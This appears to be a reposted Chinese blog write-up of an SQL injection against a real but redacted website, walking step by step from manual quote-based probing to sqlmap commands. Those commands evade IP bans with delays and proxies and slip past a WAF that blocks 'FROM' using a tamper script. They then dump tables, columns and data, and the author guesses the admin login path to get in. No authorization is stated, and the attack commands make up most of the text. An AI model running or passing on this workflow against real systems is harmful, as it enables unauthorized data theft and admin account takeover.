首页 安全文摘 渗透测试 正文

实战|记一次SQL注入过WAF思路分享

判断注入点输入'--> 报错输入''--> 回显正常可以确定是使用单引号闭合的输入' and '1'='1 --> 回显正常, 可以查询到数据 输入' and '1'='2 --> 回显正常, 但未查询到数据可以确定存在注入 接下来就是跑数据,

判断注入点

输入'--> 报错

输入''--> 回显正常

可以确定是使用单引号闭合的


实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第1张

输入' and '1'='1  --> 回显正常, 可以查询到数据

实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第2张

 

输入' and '1'='2 --> 回显正常, 但未查询到数据

可以确定存在注入

实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第3张

 

接下来就是跑数据, 直接掏出sqlmap

Sqlmap -u "http://www.xxx.com?id=2" --batch

一片红!!! nice

再次访问IP已经被封掉了

实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第4张

 

根据经验推测应该是因为访问过于频繁导致的

开代理换个IP, 加个延时参数继续

OK, 成功跑出注入点

sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch

实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第5张

查询当前数据库用户权限, 不是高权限, 所以只能去找Web后台管理员账号密码

sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch --is-dba

实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第6张

查询当前数据库, 成功

sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch --current-db

实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第7张

查询表, 失败

sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch -D [库名] --tables

嗯??? nice

有WAF, 赶紧去访问网站看看IP有没有被封

还好, 没有被封

实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第8张

显示Payload, 看看是哪句被拦截了

sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch -D [库名] --tables -v 3

可以看到第一次被拦截的payload

实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第9张

将被拦截的payload的放到浏览器中去访问, 果然被WAF拦截了

实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第10张

手工模糊测试, 发现被拦截的为关键字: FROM

实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第11张

这里说下个人思路:

  1. 在已经确定是什么WAF的前提下, 网上去查询过相关WAF的思路, 这里我找到了几个, 尝试后还是没有绕过去

  2. sqlmap自带有过WAF脚本, 我去查询了下有没有能代替<FROM>的其他关键字, 很遗憾没找到

  3. 然后考虑尝试使用编码, 注释类的脚本去过, 经过反复测试, 成功绕过

  4. 查询tamper脚本的相关文章链接: https://www.freebuf.com/sectool/179035.html

sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch -D [库名] --tables -v 3 --tamper=halfversionedmorekeywords

实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第12张

接下来就简单多了

查询表--tables

实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第13张

查询列--columns

实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第14张

查询数据--dump

实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第15张

sqlmap跑数据的同时, 我去找了下后台

因为限制了访问速度, 所以这里我没有选择用御剑等工具去扫, 一般情况下可以先去做下目录扫描

看看有没有robots.txt文件, 404

实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第16张

搜索引擎搜索一波

实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第17张

                                   

找到一个会员登录的页面: http://www.xxx.com/login.aspx

额..., 一看会员登录是这种文件名, 管理员后台也不会难找到哪里去

实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第18张

顺手在login.aspx前加了个admin

http://www.xxx.com/admin/login.aspx

特么的就访问成功了...

所以这里我得出了一个重要的结论: 运气好等于成功了一半 (手动滑稽)

实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第19张

 

成功登录, 至此测试结束

这里不再进行深入测试

实战|记一次SQL注入过WAF思路分享 安全文摘 黑白网 渗透测试  第20张

文由安全小圈

海报

本文转载自互联网,如有侵权,联系删除

转载请注明本文地址:https://heibai.org.cn/1554.html

相关推荐

发布评论

ainiaobaibaibaibaobaobeishangbishibizuichiguachijingchongjingdahaqiandaliandangaodw_dogedw_erhadw_miaodw_tuzidw_xiongmaodw_zhutouganbeigeiliguiguolaiguzhanghahahahashoushihaixiuhanheixianhenghorse2huaixiaohuatonghuaxinhufenjiayoujiyankeaikeliankouzhaokukuloukunkuxiaolandelinileimuliwulxhainiolxhlikelxhqiuguanzhulxhtouxiaolxhwahahalxhzanningwennonuokpinganqianqiaoqinqinquantouruoshayanshengbingshiwangshuaishuijiaosikaostar0star2star3taikaixintanshoutianpingtouxiaotuwabiweifengweiquweiwuweixiaowenhaowoshouwuxiangjixianhuaxiaoerbuyuxiaokuxiaoxinxinxinxinsuixixixuyeyinxianyinyueyouhenghengyuebingyueliangyunzanzhajizhongguozanzhoumazhuakuangzuohenghengzuoyi
感谢您的支持